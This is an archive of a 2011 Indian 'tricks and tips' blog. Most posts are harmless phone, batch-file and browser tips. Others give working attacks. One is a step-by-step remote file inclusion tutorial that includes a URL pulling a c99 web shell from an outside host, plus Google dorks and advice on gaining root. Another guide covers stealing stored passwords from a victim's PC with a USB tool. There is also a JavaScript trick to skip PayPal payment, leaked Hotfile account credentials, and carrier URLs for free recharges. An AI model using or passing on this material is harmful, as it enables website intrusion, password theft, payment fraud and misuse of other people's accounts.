Tuesday 29 March 2011

WATCH LIVE CRICKET MATCH AND STREAM ON YOUR WEBSITE,BLOG AND DESKTOP

Are you away from home?or are you in office?taking leave on match days?

Here is the solution for all your questions and you can watch cricket online with your internet connection.I am here  with a collection of channels showing live cricket match online.You can watch live cricket with the help of this site http://www.netcricket.tk/ over more than 4 channel from different servers.This site provides a high quality streeming of live cricket world cup.I mean you can able to watch live match even with the help of dial up connection.You can connect your mobile to PC and use this for watching live match.It will give high performance over highspeed inter net.

One benefit of this site is it provides you to streem live on your site.It providing a iframe for putting live match on your blog or website.With the help of this iframe the users who are all not having a blog or website can watch match on system desktop.

I personnally put that in my blog and you can watch live match my blog itself. check it at http://newtricksandtips.blogspot.com/p/live-cricket.html

I am here embedding that code for you..If you are a owner of a blog copy the code and paste in your site where ever  you want
If you are a normal user copy the code and paste it on notepad the save it as cricket.html.After saving double click on it and open with any browser now you will be able to watch live game.



watch more on http://www.netcricket.tk/
Share it with your friends....Comment here on my blog...Ask your doubts here..If any one able to clear the doubts clear here itself.

This site is not working now...

INVITE ALL YOUR FRIENDS FOR AN EVENT OR GROUP IN FACEBOOK WITH ONE CLICK

1. First of all you will better have to download the Google Chrome browser for better functionality from here.
2. Log in to your facebook account and go to the Event or the Group to which you want to invite all your friends within a few seconds.
3. Click the button "Invite Friends" in order to select friends.
4. Now it is the most crucial point. Copy this javascript code:

javascript:elms=document.getElementById('friends').getElementsByTagName('li');for(var fid in elms){if(typeof elms[fid] === 'object'){fs.click(elms[fid]);}}

paste it to the address bar of your facebook page after you have raised the "www.facebook.com..." and press the enter button. You can watch all your friends being selected and now just press the button "Invite".

Sunday 27 March 2011

HOW TO MAKE CON FOLDER IN YOUR COMPUTER

Did you ever think that why cant you create folders like con,nul , prn,etc..in our PC.So here's the solution..with this solution you can create almost any folder in your PC like the above mentioned..(prn,nul,con,etc)..So let's get started...

To make folder "con"in your PC,you have to make two Batch files.One file would be 'con maker.bat' and another file would be 'con remover.bat'.You have to create 'con remover.bat' because you cannot delete the folder "con" very easily.So here's the command for the batch file "con maker.bat".Paste this command in Notepad and save it as 'con maker.bat'.

@echo off
mkdir c:\con\
start c:
msg * con has been created..



Now the command for 'con remover.bat'.Paste this command in Notepad and save it as 'con remover.bat'.

@echo off
rmdir c:\con\
start c:
msg * con has been removed successfully.


Firstly, open 'con maker.bat' then you will see a folder name 'con' in C: drive and then open 'con remover.bat' to delete 'con' folder from your computer.

You can change the drive by changing the drive name and can change the path too...

Submit your tricks to me for sharing in my blog with your name and url

HOW TO MAKE A CALCULATOR USING BATCH FILE

To create a calculator using batch file open notepad and copy the code below
----------------------------code------------------------------
echo off
cls
echo.
echo This is multiplication calculation
set/p "user=FirstNo=>"
set/p "pass=SecondNo=>"
set /a a=%user%*%pass%
echo so the answers is = %a%
pause >nul
---------------------------end code---------------------------

 paste the copied code in your notepad and save as "calculator.bat" or any other name with bat extension
you can change * with +,- and /  to perform various operations

Share your tricks with me to post in my blog with your name or url
Subscribe posts via email to get updates via email

TRANSFER FILES BY THE USE OF COMMAND PROMPT

To transfer files in your computer using CMD follow the steps below
Click on Start>Run.(Microsoft +r)
Then type CMD and click OK.
A black color dialog box will appear.
For example,I'm copying a file from a folder named 'magic' in c: drive to drive f:..
To perform this operation write the below code  in CMD.

xcopy c:\magic f:\ /s

Then press ENTER.Your files will be copied.
For copying other files and folders just change the directory in this command and leave everything same as it is.
EnJoy..
 
 
Share your tricks with me to post in my blog...
You can also share by commenting....

Saturday 26 March 2011

CALL AIRTEL CUSTOMER CARE FOR FREE

For a long time Airtel is charging for calling to customer care at rate of 50ps/3minutes.Today I am going to share the trick to call free to customer care...

Just dial 12161p2p5#p5


The p can be dialled by pressing the *key..

Just share your tricks with me I can post it in my blog with your name or url.

HOTFILE PREMIUM ACCOUNT HACK MARCH APRIL 2011

Use the following user name and password for accessing hotfile premium account

user: operatr2828
pass: op010251


user: kayacan48
pass: 147258369

TOP 10 IPHONE TRICKS AND TIPS


This free guide explains in detail how to perform both the very simple and the most tedious tasks. Find out how to get your hands on fresh applications, how to keep your device synchronized and even how to jailbreak your iPhone!


1. Enable parental controls, useful when you want to restrict the content your child can access. Restrictions can be applied to all the categories of content available on the iTunes Store: music, applications, movies and TV shows.

Settings->General–>Restrictions. Tap “Enable Restrictions” and choose a four digit code. Enter it a second time for confirmation then tap the sliders according to your requirements.


2. Add new words to the iPhone dictionary, making sure that the AutoCorrect function will recognize the word you’re typing and not replace it.

Open the Notes application and type the words repeatedly. After typing each respective word at least 5 times, it should be added to the dictionary.


3. If your native language requires the input of special characters such as e and é è ë ê, just press and hold the main character on which it is based and additional characters will be displayed.



4. You can very quickly scroll back to the top of the screen by tapping on the status bar at the top of the screen.


5. Fast forward or rewind music and videos by pressing and holding the >> and << buttons.

6. Access the scientific calculator by rotating the iPhone into landscape mode (when using Calculator).


7. When receiving a call, press the sleep/hold button at the top of your iPhone once and it will silence the ringer. Press that button twice and it will both silence the ringer and send the call to voicemail.



8. Customize the double click functionality of the Home button.
Settings->General->Home. Available destinations are Home, Phone Favorites, iPod Controls and Search.



9. You can undo typing by shaking your iPhone. If you want your text back, simply shake again


10. The fastest way to delete a single e-mail or podcast is to swipe your finger from left to right across the e-mail. That will cause a red Delete button to appear so that you can confirm that you want to delete.



TRACE A WEBSITE USING COMMAND PROMPT

How to Trace a Website using Commands Prompt
Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted.
Follow the below steps:
1. Start->Run->CMD ie; open Command prompt(microsoft +r)
2. Type the following command and press enter.

tracert www.websitename.com

In the above command, enter the desired website name.
Once you press enter, it tell you where a particular domain is hosted, Location, Country and some details of that domain.

GET LATEST FILM NEWS ON TATA DOCOMO

HI FRENDS
Get the latest Cinema Gossip, News and More IN DOCOMO with Free Picture Downloads.To get this trick

Send

"SUB PIC" TO 543210 (tollfree)

its a free trial FOR 7 days...
Just unsuscribe on 6th day and suscribe again on the next day...

EDIT ANY WEBSITE IN THE INTERNET WORLD

1) Go to the site you wish to edit

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

4)Hit Enter
3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

GET FREE CRICKET SCORE UPDATE ON JUST ONE MISS CALL

Hello friends again everyone get free cricket score through this method
just dial 09004444444 nd wait 2 or 3 sec ur
call will automatically disconnect nd get live cricket score in ur inbox...Try dis method again nd again & enjoy. .

AIRCEL RS 9 RECHARGE TRICK

Aircel is providing a sms pack for Rs 9.You can get upto 50sms for Rs 9 recharge.Now here is the trick to extend your sms count.
First recharge with Rs 9 and get 50 sms free.
Then dial *122#
Select 350sms option.

Then you will get total of 400 messages for one week validity....

Enjoy...

Submitted by

Sujoy Khan

Monday 21 March 2011

AIRTEL FREE GPRS 100%WORKING IN DEFAULT BROWSER

hello friends,

You can use FREE AIRTEL GPRS .

Use below settings in default browser.

its 100% working.


Proxy – 202.133.60.187

Port – 8080

APN – airtelgprs.com

Homepage – 122.170.122.191.www.proxy-service.mobi/

Enjoy and reply.

RELIANCE CDMA FREE CALLING TRICK

This trick is applicable for only the reliance CDMA users.

By using this trick you will get 25 minute Reliance to reliance call free


To activate this trick compose a message  as OFU and send to 56789

Sunday 20 March 2011

HOW TO UNLOCK PDF FILES

Some PDF documents prevent the user from copying and pasting or printing it’s contents. Now there is a free online tool that allows you to unlock a locked PDF document, Password-protected PDF documents prevent the user from copying and pasting or printing it’s contents.
How to Unlock PDF Files


To unlock a PDF file, enter it’s location in the “PDF file to unlock” field, by either typing it in the field or clicking on the “browse” button, then navigating to it’s location.
The unlocked version of the PDF will be displayed in a new browser window, opened in the default PDF application for your system (usually Adobe Acrobat Reader)
Free PDF Unlock Online Utility


Submitted by Anuraj.R

UNINOR FREE CALLER TUNE TRICK

Uninor ur tune-




>Send blank sms to 52211



>Keep balanc 70ps.



>Go to ur sim service menu.



>Go to music



>Then ur tune as u like.



>Ur tune is set.

HACKING WEBSITE BY REMOTE FILE INCLUSION

Note: Website hacking is illegal, this article is for Educational purposes only
Hello friends, in my previous articles about website hacking, i have discussed different ways to hack websites and also i have explained the Website hacking using SQL injection in detail. Today i am going to explain an advanced method of hacking websites that is How to hack websites using Remote File Inclusion. As the name suggests Remote File Inclusion is technique where we inserts the file (in hacking terminology called Shell) in to the Website and gets the admin rights. Lets discuss this type of Website hacking technique in detail, so friends read on...

How to hack websites using Remote file inclusion
Remote File Inclusion : Website hacking Method



What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting the admin rights of the server by inserting a remote file usually called as SHELL (a shell is graphical user interface file which is used to browsing the remote files and running your own code on the web servers) into a website, whose inclusion allows the hackers to execute the server side commands as a current user logged on, and have the access to all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites and more than 60% websites on the internet using PHP are vulnerable to this attack.


Which Websites are Vulnerable to Remote File Inclusion attack?
First and the very basic question arises in the mind of new hackers that How we can find the websites that its prone to remote file inclusion attack. And what are the basic vulnerabilities in the website that we will target to hack any website and web server. Answer to these questions is quite simple.
Many of the web servers are vulnerable to this type of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled.
Note: In the PHP 6.0, register_globals has been removed but still the second vulnerability remains open, so we can give it a try to latest version PHP websites too. But a good news for hackers is that around 90% websites on the internet still uses old versions of PHP and another good news in those 90% websites, more than 60% websites has default settings enabled. That means we can hack most of the websites and deface them. Isn't that cool, but as i have said we are ethical hackers we only find vulnerabilities in the websites .


Now lets start step by step Remote file inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : CLICK HERE

I have already listed a lot off GOOGLE DORKS in my previous post of hacking websites, so you can look them here:
How to deface websites using SQL injection.


Step 2: Identifying Vulnerable website

Websites that have the page navigation system similar to below mentioned:

http://target-site.com/index.php?page=PageName


Step 3: Checking Website is Vulnerable or Not
To check if a the website is vulnerable to remote file inclusion attack, we would try to include a website link instead of PageName as shown below:

http://target-site.com/index.php?page=http://google.com


Now if the Google Home Page opens, then its confirmed that website is vulnerable to Remote File Inclusion attack and we will continue our attack. If Google homepage doesn't opens, we will try another website.


Step 4: Remote Inclusion of Shells
Now we know that website is hackable, so we will now include the shells into the website. There are number of shells available online but my favorite are C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your systems or PC, we can directly use the online resources for doing that but if you wish you can download them from their respective websites. I will not provide these here because its unethical but Google it and u can find them easily.
To find the a shell the hacker would search Google for:

inurl:c99.txt

This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of Shell so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems.

For future use of Analysis you can download these shells from here:

http://www.localroot.net/


The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?


Step 5: Adding Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.


Step 6: Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:

allinurl:.php?page=

This looks for URL’s with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar
words.

Hackers usually search vulnerability databases like http://www.milw0rm.com/ for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

Step 6: If Attack Successful
If we succeeds in getting the server to parse the shell, then we will be see a screen similar to the following:

hacking websites using remote file inclusion, learn how to hack websites
Hacking Website using Shell RFI attack

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell but this time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.


Step7: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. you can find list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the times contain username and passwords for the MYSQL databases and such.

That's all the way to hack websites using the remote file inclusion method. I hope you all have liked it. And i am sure you all have a lot of questions regrading this, so don't hesitate and ask in form of comments. I will try to clear all your queries.


How to Protect your Websites and Forums from Remote file inclusion attack?
As we are ethical hackers i will also explain for webmasters to protect their websites from RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Submitted by

Daisy

SEND AND RECIEVE EMAIL ON MOBILE WITHOUT GPRS CONNECTION

Now it is possible to receive emails on your mobile without using GPRS. This has been made possible by a new application called BlacMail. BlacMail, launched by BSNL, is a mobile app that allows you to receive and send emails on your mobile phone instantly, without GPRS.

BlacMail allows you to connect with other popular web mail service providers like Yahoo! Mail, Gmail and Hotmail as well as popular social networking sites like Facebook, Orkut and Twitter. Additionally, it allows you to share job alerts from popular employment portals like Naukri, TimesJobs and Monster. Presently, this pushmail service is available only in certain places in southern India. However, BSNL plans to launch the service nationwide soon.

Features of BlacMail

* White list –This feature helps you to receive emails from selected group of contacts only and thus avoid spam easily.
* Separate Mail Box – BlacMail is a separate app and hence it has a separate inbox for your mails. It does not clutter your inbox with SMS(s).
* BlacMail PIN – The PIN is to ensure the safety of your BlacMail emails. After activating the PIN, you will have to enter that PIN every time you want to access BlacMail app on your mobile.
* On Demand Check Mail – This feature allows you to get your emails only when you want it.

BlacMail should work on any cell phone with Java, MIDP 2.0 + and CLDC 1.1 +.

Detail information and download available here

HACK EMAIL ACCOUNT PASSWORD USING USB THIEF NEW VERSION

USB Thief is a type of portable stealer software used to hack all locally stored passwords on victim computer. A password is locally stored if the victim hits "Remember Me" while logging in to his account. USB Thief steals following information:

How To Hack Email Account's Password UsingUSB Thief

1. Free Download USB Thief to hack victim passwords.(Opens in new window)

2. Unzip the file. Connect USB drive to your computer. Format it.

3. In downloaded file, go to: "USB Thief Modified" -> "Copy" folder and copy all the files in that folder. Paste all the files in USB drive.

4. Now, in USB drive, hit on "hideh.bat" file which makes all the files in USB drive hidden. Delete "hideh.bat" file.
5. Move on to victim computer and plug in the USB. Open the USB drive on victim computer and wait for 8-10 seconds. Safely remove the USB from victim computer. All the victim passwords are thus, now captured in our USB drive.

6. Now, to see these passwords, copy "showh.bat" file from the downloaded files. Paste this file in your USB drive and run it in USB. Now refresh. You will be able to see all the hidden files.
7. Open "IMNeoWorld" folder which will contain all hacked passwords and license keys.


Try out this USB Thief to hack victim stored passwords. This password hacking software is really useful if you have physical access to victim computer. If you have any problem in using this USB Thief as password hacking software, please mention it in comments.

Hack Facebook Accounts,Hack Email Account password,Hack Facebook Account Password,Hack Gmail Account Password,Hack Facebook Account Using Keylogger,Hack Facebook Account Using Password Stealer,Hack Yahoo Account Password,Hack Hotmail Account Id,Hack Facebook Account ID,Hack Facebook Password,Hack MSN Account password,Hack Email Accounts,Hack Email Account Password

SIMPLE THREE WAYS TO GET LISTED IN GOOGLE

There are three simple methods to getting listed in Google, but only one of these is guaranteed... well almost. ;o)
1. Submit Direct To Google
The first method is to submit your web site via Google's free submit your site form. Just submit your home page and Google's crawler, Googlebot, will crawl the rest.
However, Google does not add all submitted URLs to their index, and there is no guarantee as to when, or if, your site will be indexed.
2. Get Linked From A Site That Google Crawls
The second method is to get a site that Google already crawls to link to your site. So when Google recrawls the web site, it will find the link to your site and crawl and index it as well.
This is Google's preferred method of finding sites to index.
To get another site to link to yours, simply look for a site that links to your competitors and ask them to link to yours. You may have to offer a link back to their site in exchange.

You can get a link back from my site by commenting on below my posts.I wont moderate your comments..I know the difficult to get crawl in Google ..But remember one thing that when you comment just comment related to my post,otherwise the google will mark it as spam.

The linnk back from any site will help you to crawl your site faster than submitting it to directory..

3. Submit Your Site To The Yahoo! Directory and The Open Directory Project Index
The third method is to submit your web site to the Open Directory Project index.
As far as I know, this is the only guaranteed method of getting into the Google index.
For more information, visit the How to add a site to the Open Directory page.
Once your site is included in either of these directories, it should appear in Google in about 4 to 8 weeks.

HOW TO GET A USER NAME FOR YOUR FACEBOOK PROFILE OR PAGE???

By default profiles on Facebook are of the form facebook.com/profile.php?id=xxxxxxxxxxxxx,You can take your own user name for your facebook account.for example www.facebook.com/yourname.When you observe my account you can see that my facebook account is at www.facebook.com/tricksandtips, This url will lead you to my account.Similarly you can get your own user name and can spread your user name very easily with your friends.

                      To claim your personalized Facebook URL, log in to Facebook and go to the link, http://www.facebook.com/username. Once you are there, Facebook will suggest some Usernames for you to pick. Facebook's picks will be based on your name or other account information, and there may be one option to take your own name.

                      Once you have decided on the Username you want to check whether that it is available, click on the "Confirm" button and the name is yours!

                      You may not be able to get the exact Username you want. If Facebook informs you that the name isn't available, you will have to try another form of the name or word, or move onto some other choice. Usernames are First Come, First Serve, so if you want yours, claim it now!

Similarly you can get an username for your facebook page too.But there is a restriction that you should have minimum of 25 page like to get a username.Once you have reached the 25page like just follow the above proceedure..
Note that once you have selected your username you are unable to change your username.

Enjoy...For any assistance please leave comments below....

Friday 18 March 2011

BYPASS PAYPAL PAYMENT TO GET FREE STUFFS,PAYPAL HACKING

I found a script to get a book, script, soft, ... on a website using a Paypal button to sold it.

Just add the following in bookmark, or copy/paste it.

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);




When you are visiting a page using a paypal button, just click the bookmark or paste the code in the URL bar of your navigator.

If it works, you will be redirected to the download page
Else, try another site (or buy it )

It works with :
Chrome [y]
Firefox [y]
IE [?] (anyone can test it?)
Opera [y]
Safari [y]

A link the script works on : http://www.ptcexpert.com/

Try script on above website::If you find another link, please share
find website using google:::
search below code with quote
"this order button requires a javascript enabled browser"
then follow by Page:1

Here Screen Shots
Step:1


Step:2


Step:3




Note: This is illegal and is for educational purpose only. Any loss/damage or mis happening, will not be in any way our responsibility.

Tuesday 15 March 2011

GOOGLE LAUNCHED ENCRYPTED SEARCH FEATURE FOR WEB SEARCH

With Google search over SSL, you can have an end-to-end encrypted search solution between your computer and Google. This secured channel helps protect your search terms and your search results pages from being intercepted by a third party. This provides you with a more secure and private search experience.

To use search over SSL, visit https://encrypted.google.com/ each time you perform a search. Note that only Google web search is available over SSL, so other search products like Google Images and Google Maps are not currently available over SSL. When you're searching over SSL, these properties may not appear in the left panel.

What is SSL?
SSL (Secure Sockets Layer) is a protocol that helps provide secure Internet communications for services like web browsing, e-mail, instant messaging, and other data transfers. When you search over SSL, your search queries and search traffic are encrypted so they can't be read by any intermediary party such as employers and internet service providers (ISPs).
What can I expect from search over SSL?
Here's how searching over SSL is different from regular Google search:
•SSL encrypts the communication channel between Google and a searcher's computer. When search traffic is encrypted, it can't be read by third parties trying to access the connection between a searcher's computer and Google's servers. Note that the SSL protocol does have some limitations — more details are below.
•As another layer of privacy, SSL search turns off a browser's referrers . Web browsers typically turn off referrers when going from HTTPS to HTTP mode to provide extra privacy. By clicking on a search result that takes you to an HTTP site, you could disable any customizations that the website provides based on the referrer information.
•At this time, search over SSL is supported only on Google web search. We will continue to work to support other products like Images and Maps. All features that are not supported have been removed from the left panel and the row of links at the top. You'll continue to see integrated results like images and maps, and clicking those results will take you out of encrypted search mode.
•Your Google experience using SSL search might be slightly slower than you're used to because your computer needs to first establish a secure connection with Google.
Note that SSL search does not reduce the data that Google receives and logs when you search, or change the listing of these terms in your Web History .

Information for school network administrators

How will SSL search affect our content filtering services?When students search using https://encrypted.google.com/, their searches will bypass any content filters that are in place on your network. If this is problematic for your school, you can block https://encrypted.google.com/. When students continue to search using https://www.google.com/, your content filtering will work as it always has in the past.
If your students try searching via the https://www.google.com/ homepage, they will be redirected to https://encrypted.google.com/ and will not be able to perform encrypted searches to bypass content filters.
If I block access to https://encrypted.google.com/, will I block access to all of Google's authenticated services (like Google Apps for Education)?No; logins for Google Apps for Education and our other authenticated services are currently hosted at https://www.google.com. As long as you allow access to https://www.google.com, your organization should still be able to access all of our other services.

Does SSL provide complete security?
While SSL helps prevent intermediary parties, such as ISPs, from knowing the exact search that you typed, they could still know which websites you visit once you click on the search results. For example, when you search over SSL for [ flowers ], Google encrypts the query "flowers" and the results that Google returns. But when you click on a search result, including results like images and maps, you could be exiting the encrypted mode if the destination link is not on https://.
If your computer is infected with malware or a keylogger, a third party might still be able to see the queries that you typed. We recommend that everyone learns how to prevent and remove malware.

Remember that only Google web search supports search over SSL, so searching Google Images, for example, will not be encrypted.

Technical discussion of SSL protocol-level limitations

While SSL is a clear privacy and security benefit, we are aware of some technical limitations to SSL at the protocol level that are not specific to Google's implementation:
A determined, skilled malicious party could potentially interpose himself into the network traffic and present a spoofed certificate to the user. In many cases, this will result in a certificate warning to the user. If you see a certificate warning, the protection may not hold.An adversary with the ability to install root certificates on the machine could potentially interpose himself into the network traffic without any warnings appearing.A highly capable source may be in a position to sign certificates with a standard, pre-installed certificate authority (CA), which again would allow intercept without any apparent warnings to the user.Even if all web searching occurs over SSL, a passive traffic listener may still be able to observe DNS look-ups.
How can I confirm whether I'm on a secure connection?
Check to see that the URL you're on starts with https:// instead of http://. Most browsers provide a visual confirmation (such as an icon of a lock) in the address bar or in the status bar at the bottom of the page. On Google SSL search, you'll also see a special Google SSL logo with a lock icon. In addition to this logo, be sure to also check the https:// text in the address bar and any browser lock icons.

When you perform a search on https://encrypted.google.com/, you might see a warning if a page has some non-secure components: depending on your browser settings, you might see the lock icon turn into a warning sign, a pop-up message, or some other form of alert. This issue is often referred to as a "mixed mode error."

Since this is a beta feature, there might be some rare cases in search over SSL that generate a mixed mode error. We're working to prevent such errors, and you can help if you report any errors through our Help Forum.


Read original post at GOOGLE

ENJOY 3G SPEED IN VODAFONE USING 2G RECHARGE

If Vodafone hasn't officially launched 3G in your state/city and if it is going to launch soon then its your golden opportunity to enjoy 3G speed using 2G bonus cards like rs21(2 days unlimited),etc.

To enjoy this trick sms  ACT 3G to 144 and wait for a confirmation message. I've tried it in my state, its working perfectly!
The drawback of this is you will only get a maximum of validity 30 days and also you wont able to make video call which is available in the 3G network.
This trick will help you to enjoy the 2G at an average speed of 900kb/sec

Enjoy....
Trick by Naveen

FREE VODAFONE BALANCE TRANSFER IN GUJARAT

I tried and got success in the balance transfer trick in Gujarat.Using this trick you can transfer balance from one vodafone to another vodafone number.The trick for balance transfer is given below

Just dial *131*AMUNT*MOBILE MO.# AND PRESS CALLING BUTTON

Example: *131*10*987988xxxx# and press calling button(normally it in green colour).

Enjoy....


Trick by Jack

Monday 14 March 2011

FREE MO PROXY FOR AIRTEL USERS IN MAHARASHTRA

Create a new connection with the following:
 IP -200.199.82.61
Port No. -8080
APN - airtelgprs.com
Hey, Plz Post your comments on the trick. whether it is working in your state or not.

Submitted by
        Nishant24

NOW GET FREE HELLO TUNE FOR 1 MONTH WITH DOWNLOAD FREE

Now get free hellotune in airtel for one month with download free just call  543211888 from you airtel number

Submitted by

Nishant24

AIRTEL FREE GPRS SETTINGS

Free Airtel GPRS Setting.
 Create a new connection as per the parameters -
Proxy: 94.246.126.253
Port: 80
APN: airtelgprs.com

Plz, reply your comments after using in your state. wheteher it works or not.

Submitted by

Nishant24

Saturday 12 March 2011

LATEST FREE GPRS TRICK IN RELIANCE RS 99 GPRS PACK HACKED FREE GPRS

Rs 99 Free Gprs Hack For Reliance March 2011 Latest Trick

* First go to this link :-
http://97.253.28.151/subappvasWeb/manager?&chID=RW&appID=109&reqID=1&mdn=95109******

* Replace your mobile number with 95109****** ( note : with 0 in front)

* Use this link in your mobile default browser with rcomwap settings.

* Balance Must Be above 0.01 rs while using this link

* Now you got this " Reliance Free Recharge Trick For rs 99 gprs pack : march 2011 "

* Your mobile is now recharged

* Enjoy !!!!!!!


Rs 29 Free Gprs Hack For Reliance March 2011 Latest Trick


* goto

http://97.253.28.151/subappvasWeb/manager?&chID=RW&appID=111&reqID=1&mdn=9825*****




Unsubscribe for " Free Reliance rs 99 Gprs Hack For March 2011 "




*http://97.253.28.151/subappvasWeb/manager?&chID=RW&appID=109&reqID=2&mdn=95109*****

Trick by
newtricks




ENjoy and donot forget to comment

MANUAL GPRS SETTINGS FOR AIRTEL,IDEA,VODAFONE,TATA DOCOMO,RELIANCE,AIRCEL,BSNL,UNINIOR AND VIDEOCON

I have collected some of the settings which you can configure GPRS yourself without calling the (not so helpful) respective customer care representatives. Also, using these settings you can configure and run Internet (GPRS/EDGE) on those mobile phones which aren’t supported by your service providers! Following are the manual settings:

AIRTEL

AIRTEL LIVE

Account Name – Airtel live

Homepage – http://live.airtelworld.com

Username – Leave Blank

Password – Leave Blank

Proxy – Yes

Server Adress (Proxy) – 100.1.200.99

Access Point – airtelfun.com

Server Port (Proxy) – 8080

Data bearer – GPRS (Packet Data)

Authentication Type – Normal

MOBILE OFFICE

Account Name – Airtel Mobile Office

Homepage – http://www.trickzone.tk/

Username – Leave Blank

Password – Leave Blank

Proxy – No

Access Point – airtelgprs.com

Server Port – 8080

Data bearer – GPRS/Packet Data

Authentication Type – Normal

AIRTEL NOP

Account Name – Airtel NOP

Homepage – http://www.trickzone.tk/

Username – Leave Blank

Password – Leave Blank

Proxy – Yes

Server Address (Proxy) – 100.1.200.99

Access Point – airtelwap.com

Server Port (Proxy) – 8080

Data bearer – GPRS/Packet Data

Authentication Type – Normal

AIRTEL MMS

Account Name – Airtel MMS

Server Address – http://100.1.201.171:10021/mmsc

Proxy Address – 100.1.201.172

Proxy Port – 8799

IDEA

IDEA GPRS

Account Name – Idea Internet

Username – Leave Blank

Password – Leave Blank

Homepage – http://wap.ideafresh.com

Server Port (Proxy) – 8080

Server adress (Proxy) – 10.4.42.45

Databearer – GPRS /Packetdata

Access Point – imis

Proxy – Yes

Authentication Type – Normal

VODAFONE

VODAFONE GPRS

Account Name – Vodafone GPRS

Homepage – http://live.vodafone.in

User Name – Leave Blank

Password – Leave Blank

Proxy – Yes

Proxy Address – 10.10.1.100

Proxy Port – 9401 (or 9201)

Data Bearer – Packet Data

Packet Data Access Point – portalnmms

Network type – IPV4 (Look for it in advanced settings)

Authentication – Normal

TATA DOCOMO

TATA DOCOMO DIVE IN

Account Name – Docom Dive

Username – Leave Blank

Password – Leave Blank

Homepage – http://divein.tatadocomo.com

Server Port (Proxy) – 8080

Server Address (Proxy) – 10.124.94.7

Databearer – GPRS /Packetdata

Access Point – tata.docomo.dive.in

Proxy – Yes

Authentication Type – Normal

DOCOMO INTERNET

Account Name – Docom Net

Username – Leave Blank

Password – Leave Blank

Homepage – http://www.trickzone.tk/

Proxy – No

Databearer – GPRS /Packetdata

Access Point – tata.docomo.internet

Proxy – Yes

Authentication Type – Normal

DOCOMO MMS

Account Name – Docomo MMS

Username – Leave Blank

Password – Leave Blank

Access Point- tata.docomo.mms

Homepage- http://mmsc/

Proxy – Yes

Server Address (Proxy) – 10.124.26.94

Port – 8799

Databearer – GPRS/Packetdata

Proxy – Yes

Authentication Type – Normal

RELIANCE

Reliance GSM WAP (GPRS)

APN – rcomwap

Login Request Required – off

Authentication – PAP

Data Compression – off

Header Compression – off

Settings Name – Mobile World

Home Page – http://wap.rworld.co.in

Proxy – Yes

Proxy Server Address – 010.239.221.005

Port – 8080

Username – Leave Blank

Password – Leave Blank

Reliance GSM RCOMNET

Account Name – RCOMNET

APN – rcomnet

Proxy – Leave Blank

DNS – Leave Blank

Username – Leave Blank

Password – Leave Blank

Reliance MMS

APN – rcommms

Login Request Required – off

Authentication – PAP

Data Compression – off

Header Compression – off

Settings Name – Reliance MMS

Proxy – Yes

Server Address (Proxy) – 10.239.221.5

Port – 8080

Username – Leave Blank

Password – Leave Blank

Server URL: http://10.239.221.47/mms/

AIRCEL

Aircel GPRS

Accont Name – Aircel GPRS

APN – aircelgprs

Homepage – http://www.trickzone.tk/
Proxy – Leave Blank

DNS – Leave Blank

Username – Leave Blank

Password – Leave Blank

Aircel Pocket Internet (WAP)

Account Name – Aircel WAP

APN – aircelwap

Homepage – http://www.trickzone.tk/

Proxy – Leave Blank

DNS – Leave Blank

Username – Leave Blank

Password – Leave Blank

BSNL

BSNL GPRS

APN – bsnllive

IP – 10.220.67.131

Port – 8080

Homepage – http://bsnllive.in/

BSNL MMS

APN – bsnlmms

IP – 10.210.10.11

Port – 8080

Homepage – http://bsnlmmsc.in/

BSNL Net

APN – bsnlnet

IP – Leave Blank

Port – Leave Blank

Homepage – http://www.trickzone.tk/
UNINOR

Uninor GPRS

Account Name – Uninor Gprs

Username – Leave Blank

Password – Leave Blank

Homepage – http://www.trickzone.tk/

Server Port (Port) – 8080

Server Address (Proxy) –10.58.10.58

Databearer – GPRS/Packetdata

Access Point – Uninor

Proxy – Yes

Authentication Type – Normal

VIDEOCON

Videocon GPRS

Connection Name – Videocon Internet

Data Bearer – Packet Data

APN – vinternet.com

Username – Leave Blank

Password – Leave Blank

Homepage – http://www.trickzone.tk/

Proxy server – Leave Blank

Proxy port – Leave Blank

Videocon WAP

Connection Name – Videocon WAP

Data Bearer – Packet Data

APN – vgprs.com

Username – Leave Blank

Password – Leave Blank

Homepage – http://wap.live.in

Proxy Server – 10.202.5.145

Proxy Port – 8799

Videocon MMS

Connection Name – Videocon MMS

Data Bearer – Packet Data

APN – vgprs.com

Username – Leave Blank

Password – Leave Blank

Homepage – http://10.202.4.119:10021/mmsc/

Proxy Server – 10.202.5.145

Proxy Port – 8799



Just leave comments if you know more than this...

FREE JOKES IN RELIANCE MARCH 2011

Get free jokes from indiatimes in your reliance mobile free

Type JOKE in ur msg box and send it to 58888.



You will receive joke from indiatimes free

NOTE-balance must be less than 2RS

SEND VOICE MESSAGES ON FACEBOOK

